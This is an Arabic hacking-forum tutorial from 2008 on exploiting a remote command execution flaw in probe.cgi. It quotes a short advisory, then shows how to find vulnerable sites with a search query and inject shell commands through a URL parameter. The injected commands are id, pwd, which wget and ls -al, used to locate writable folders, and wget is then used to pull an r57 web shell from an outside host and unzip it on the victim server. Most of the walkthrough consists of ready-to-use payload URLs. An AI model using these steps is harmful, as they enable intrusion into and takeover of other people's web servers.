منتدي الغندورللبرامج

مركز البرامج و الحمايه والتصميمات والفتو شوب والهكر(هذا المنتدي منظومه عربيه للاختراقات العالميه)
 
دخولمكتبة الصورالتسجيلالبوابةالرئيسية

شاطر | 
 

 التعامل مع ثغرات Remote command exucetion

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
الدكتور
رئيس مجلس الاداره
رئيس مجلس الاداره
avatar

عدد الرسائل : 368
الدوله :
المهنه :
هوايتك :
نقاط العضو :
100 / 100100 / 100

وسام :
تاريخ التسجيل : 16/01/2008

مُساهمةموضوع: التعامل مع ثغرات Remote command exucetion   الإثنين مايو 19, 2008 5:31 pm

السلام عليكم ورحمة الله

راح نشرح عمل نوع من الثغرات وهي ما تسمى

(( Remote command exucetion ))

وهي تسمح لك برفع شل او باكدور ,,,,,,الخ

اول حاجه لازم يكون عندك شل مرفوع بموقعك او احد المواقع,,,

طيب خلينا نجيب ثغره ونطبق عنونها كذا

Probe.cgi Remote Command Execution

يعني بملف Probe.cgi فيه ثغره رموت كومند حلو ...طيب خلونا نشوف الاكسبلويت


كود PHP:
Authors ....... spher3 (spher3 at fatalimpulse dot net)
Date .......... 04-07-
2005
Product
....... probe.
cgi
Type
..........
Remote Command Execution

o Info
:
================
That '''''''''''' is used to open file '.dat'
.

o Vulnerable Code
:
================
..
23
[...]
24 $old = $query->param('olddat'
);
25
[...]
..
..
34
[...]
35 open (VF, "$olddat"
);
36
[...]
..

(
24) At this line, the cgi param 'olddat' is associated to one database
.
This variable isnt checked by anyone matching,
so you can open
all file that you want
. (35) At this line the ''''''''''''
open the file
that you had chosen
. With pipe `|
`
is possible to execute arbitrary code on the ''''''''l
.


o Proof of concept
:
================

http:
//the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
uid=99(www) gid=99(www
)




لو تقراء باعلى موضح لك الملف ونوع الثغره,,,,,طيب احنا عوزين الاستثمار

استثمارها هنا بالسطر


كود PHP:
http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|



the-vuln.site.org.<<===الموقع المستهدف وهو افتراضي

cgi-bin<<===مجلد السيقيبين

probe.cgi<<===الملف المصاب

olddat<<===مكان الاصابه داخل الملف ومو شرط نفس الاسم ممكن يتغير
===============

طيب نبغى نعرف كيف عملها اوكي

اول تسوي بحث بالطريقه هذي

allinurl:probe.cgi

او اي طريقة تحب

لنفرض اننا حصل موقع

WWW.???.com/cgi.bin/probe.cgi?grid=ThaiGrid

كويس اول حاجه نضع

كود PHP:
|id|




بيطلع بالشكل


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|id|




واعطيه انتر بيظهر لك مثلا كذا



كود PHP:
uid=99(www) gid=99(www)




هذا صفتك بالسيرفر

طيب نبغى ننعرفع ممكاننا وين ضع مكان الاي دي

pwd


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|pwd|




بيطلع معك مثلا
كود PHP:
/home/.???/cgi.bin




طيب نبغى نشوف مسموح لينا نرفع ملف والا لا؟

ضع مكان الاي دي


which wget


بالشكل


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|which wget|




اذا ضهر لك كدا


كود PHP:
/؟؟؟/؟؟؟/wget



وعلامة الاستفاهم متغير يعني اهم شي ويقت تظهر فاعرف انك الوضع زي الفل

يعني مسموح لك ترفع ملف انبسط ياعم

طيب نبغى نعرف التصاريح للمجلدات والملفات عشان نشوف وين المسوح لينا بالرفع

لو ترجع احنا قلنا مكاننا وين هنا


كود PHP:
/home/.???/cgi.bin


طيب احنا نبغى نخرج من مجلد cgi.bin للديكويتري الرئيسي حلو

نضع مكان الاي دي

cd /home/.???/;pwd


يعني بيكون بالشكل


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;pwd|




الان بيرجعنا الى

كود PHP:
home/.???/



حلو الان نبغى نشوف المجلدات والمفات و التصريحات بالامر

كود:
;ls%20-al

يصبح معنا هكدا بدات اتعب ههههههههه

كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;ls%20-al|




بتظهر لك ملفات ومجلدات الموقع واما مهم تصريحاتهم

انت ابحث عن الملجلد اللي له التصريح

drwxrwxrwx

لنفرض انك حصلت امام مجلد الصور او uploads

اولا لازم نخش عليه تعمل



home/.???/uploads/;pwd


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/;pwd|




حلو بيكون وضعك بالشكل

home/.???/uploads/

يعني داخل مجلد uploads

الان كل معليك رفع الشل طبعا لك شل مرفوع باحد المواقع يعني رابط شيلك


www.XXX.com/r57''''''''l.zip

وتبغى ترفعه على الموقع المخترقه بالشكل


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/wget www.XXX.com/r57''''''''l.zip*|



واعطيه انتر بيظهر لك

r57''''''''l.zip


طيب نبغى نفك الضغط عنه بالامر unzip


كود PHP:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/unzip r57''''''''l.zip*|




وديلو انتر بيطلع معك

r57''''''''l.phpوالف خش وافتحه بالمتصفح وتمتع وبيكون الرابط

WWW.???.com/uploads/r57''''''''l.php

عموما ياجماعه الموضع كله انك تعرف كيف تتحرك وترفع ,,, وراح تكون الثغرات اسهل منها ما فيه

اتمنى ان يعجبكم الشرح

و لا تبخلو علينا بالردود

_________________

الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://elgandour.onlinegoo.com
 
التعامل مع ثغرات Remote command exucetion
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» برنامج سهل وخفيف للتحكم بالشبكة بدون ان تضع اي شيء في الجهاز الاخر
» أخيرا جميع أجزاء اللعبة الشهيرة command of conquer
» برنامج atelier web remote commander معي النسخة الكاملة سارع بالتحميل
» برنامج McAfee Command Line Scanner لفحص الجهاز من الدوس

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدي الغندورللبرامج :: قسم الحمايه من الهكر :: منتدي جديد الثغرات وطرق الحمايه منها-
انتقل الى: